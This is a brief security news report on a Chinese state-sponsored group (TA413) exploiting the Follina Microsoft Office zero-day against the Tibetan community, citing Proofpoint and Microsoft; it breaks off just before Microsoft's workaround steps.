Chinese APT exploits Follina
China-backed hackers are exploiting an unpatched Microsoft Office zero-day vulnerability, known as “Follina”, to execute malicious code remotely on Windows systems.
Microsoft has warned that the flaw could enable threat actors to install programs, delete data, and create new accounts in the context allowed by the user’s rights.
Researchers observed hackers exploiting the flaw to target Russian and Belarussian users since April, and Enterprise security firm Proofpoint said this week that a Chinese state-sponsored hacking group has been exploiting the zero-day in attacks targeting the international Tibetan community.
“TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,”. Campaigns impersonate the ‘Women Empowerments Desk’ of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.”
Proofpoint has previously observed the TA413 threat actor – also tracked as “LuckyCat” and “Earth Berberoka” – targeting Tibetan organizations using malicious browser extensions and COVID-19 themed espionage campaigns.
While waiting for a security patch, Microsoft recommends disabling the MSDT URL Protocol as workarounds, below are the instructions included in the guidance: